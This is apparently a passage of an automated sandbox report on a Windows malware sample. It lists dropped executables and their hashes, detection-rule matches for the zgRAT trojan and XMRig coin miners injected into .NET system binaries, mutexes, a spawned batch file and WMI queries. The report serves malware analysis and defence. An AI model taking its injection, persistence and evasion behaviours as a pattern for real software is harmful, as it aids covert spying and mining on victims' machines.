Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557F2F7	4_2_0557F2F7
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05595CA0	4_2_05595CA0
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0559E920	4_2_0559E920
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0559E910	4_2_0559E910
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0559D028	4_2_0559D028
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05E9B9E5	4_2_05E9B9E5
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05E9C8C8	4_2_05E9C8C8
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05E9C638	4_2_05E9C638
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05E9C637	4_2_05E9C637
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05E9C94F	4_2_05E9C94F
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_05E9C8B9	4_2_05E9C8B9
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_06745EE0	4_2_06745EE0
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067432D1	4_2_067432D1
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_06743320	4_2_06743320
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067CC170	4_2_067CC170
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067CC4E7	4_2_067CC4E7
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067CC528	4_2_067CC528
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067CC586	4_2_067CC586
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067CC2A6	4_2_067CC2A6
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067CC1EC	4_2_067CC1EC
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067CC1B0	4_2_067CC1B0
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067D6998	4_2_067D6998
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_067D752A	4_2_067D752A
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557D490	4_2_0557D490
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Code function: 4_2_0557D4A0	4_2_0557D4A0
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD34794D54	5_2_00007FFD34794D54
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD34794F38	5_2_00007FFD34794F38
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD349128D8	5_2_00007FFD349128D8
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Code function: 5_2_00007FFD34910033	5_2_00007FFD34910033
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD3477B95A	6_2_00007FFD3477B95A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD347771F3	6_2_00007FFD347771F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD3477ADF2	6_2_00007FFD3477ADF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD347771F0	6_2_00007FFD347771F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34778E25	6_2_00007FFD34778E25
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34775AF9	6_2_00007FFD34775AF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD3477BB1D	6_2_00007FFD3477BB1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34772733	6_2_00007FFD34772733
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34775BFA	6_2_00007FFD34775BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34776FCA	6_2_00007FFD34776FCA
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 8_2_00007FFD34776260	8_2_00007FFD34776260
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 8_2_00007FFD34774F38	8_2_00007FFD34774F38
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 8_2_00007FFD34774D54	8_2_00007FFD34774D54
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 16_2_00007FFD34786260	16_2_00007FFD34786260
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 16_2_00007FFD34781F26	16_2_00007FFD34781F26
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 16_2_00007FFD34784F38	16_2_00007FFD34784F38
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Code function: 16_2_00007FFD34784D54	16_2_00007FFD34784D54
Source: C:\Users\user\AppData\Roaming\l6E.exe	Code function: 22_2_013D0B8F	22_2_013D0B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040F140	24_2_0040F140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00438965	24_2_00438965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00410BE0	24_2_00410BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040F7C0	24_2_0040F7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00441840	24_2_00441840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041B054	24_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041E070	24_2_0041E070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00401000	24_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00412001	24_2_00412001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00410000	24_2_00410000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004230CB	24_2_004230CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00423940	24_2_00423940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00409909	24_2_00409909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00444110	24_2_00444110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040913D	24_2_0040913D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041A1C0	24_2_0041A1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00407980	24_2_00407980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00425198	24_2_00425198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004299B5	24_2_004299B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00424A4F	24_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00442262	24_2_00442262
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00410A70	24_2_00410A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0042E223	24_2_0042E223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00412A2C	24_2_00412A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004092C5	24_2_004092C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004012F0	24_2_004012F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00443AF0	24_2_00443AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040BA90	24_2_0040BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00432B60	24_2_00432B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00427370	24_2_00427370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00414374	24_2_00414374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00437B00	24_2_00437B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040EB20	24_2_0040EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00408320	24_2_00408320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00441330	24_2_00441330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00442380	24_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00401388	24_2_00401388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00406BB0	24_2_00406BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004123B0	24_2_004123B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00428C5E	24_2_00428C5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00412C3C	24_2_00412C3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00422480	24_2_00422480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041CC90	24_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040A4A0	24_2_0040A4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00441D50	24_2_00441D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00422D6A	24_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0042CD06	24_2_0042CD06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0042BD10	24_2_0042BD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00413D23	24_2_00413D23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00419D22	24_2_00419D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00443DE0	24_2_00443DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004265A2	24_2_004265A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00423640	24_2_00423640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00427640	24_2_00427640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00428E63	24_2_00428E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00423624	24_2_00423624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0043D630	24_2_0043D630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00404EC0	24_2_00404EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004426B0	24_2_004426B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0042C752	24_2_0042C752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00440750	24_2_00440750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00406F70	24_2_00406F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00426F10	24_2_00426F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040D7D0	24_2_0040D7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040FFDE	24_2_0040FFDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004437E0	24_2_004437E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00440FE0	24_2_00440FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040AF80	24_2_0040AF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00409F80	24_2_00409F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00403790	24_2_00403790

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe 7BFFD9CB271221C63B35A30160859EC4F2FF2BA131597D1F746C279FB53D1AD7
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe B748235A791B5F8C5B80202EF3345BC8325A7EA246B004D57DF5521E2F79B429
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\l6E.exe D737637EE5F121D11A6F3295BF0D51B06218812B5EC04FE9EA484921E905A207

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00407D30 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040C590 appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040DF50 appears 178 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4800 -ip 4800

Source: PT54FFSL7ET46RASB.exe

Static PE information: invalid certificate

Source: yTRfYxWiym.exe.3.dr

Static PE information: No import functions for PE file found

Source: PT54FFSL7ET46RASB.exe, 00000000.00000002.2156456071.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PT54FFSL7ET46RASB.exe
Source: PT54FFSL7ET46RASB.exe, 00000000.00000000.2143463492.00000000003A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVQP.exe@ vs PT54FFSL7ET46RASB.exe
Source: PT54FFSL7ET46RASB.exe	Binary or memory string: OriginalFilenameVQP.exe@ vs PT54FFSL7ET46RASB.exe

Source: PT54FFSL7ET46RASB.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.HPd7I3vQri.exe.65f0000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 4.2.HPd7I3vQri.exe.65f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 14.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 14.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 9.2.aspnet_compiler.exe.2089153ee30.2.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 9.2.aspnet_compiler.exe.2089153ee30.2.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 9.2.aspnet_compiler.exe.2089153ee30.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 9.2.aspnet_compiler.exe.208910155f8.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 9.2.aspnet_compiler.exe.208910155f8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 9.2.aspnet_compiler.exe.208910155f8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: aspnet_compiler.exe PID: 3512, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 6116, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: PT54FFSL7ET46RASB.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HPd7I3vQri.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yTRfYxWiym.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: HPd7I3vQri.exe.3.dr, Token.cs	Cryptographic APIs: 'CreateDecryptor'
Source: HPd7I3vQri.exe.3.dr, Token.cs	Cryptographic APIs: 'CreateDecryptor'
Source: HPd7I3vQri.exe.3.dr, InfoBaseConnector.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegAsm.exe.4e8260.2.raw.unpack, Token.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegAsm.exe.4e8260.2.raw.unpack, Token.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegAsm.exe.4e8260.2.raw.unpack, InfoBaseConnector.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegAsm.exe.436060.0.raw.unpack, ValClassDeSerializer.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegAsm.exe.436060.0.raw.unpack, ValClassDeSerializer.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegAsm.exe.436060.0.raw.unpack, WrapperVisitorProperty.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@38/24@4/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00438710 CoCreateInstance,

24_2_00438710

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT54FFSL7ET46RASB.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\2bd1368522bdabd3d66d2b
Source: C:\Users\user\AppData\Roaming\l6E.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\cd071f9a154feb48d7ac80bc6a259182
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1664:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Mutant created: \Sessions\1\BaseNamedObjects\b655bc4b10
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4800

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

File created: C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat" "

Source: PT54FFSL7ET46RASB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PT54FFSL7ET46RASB.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
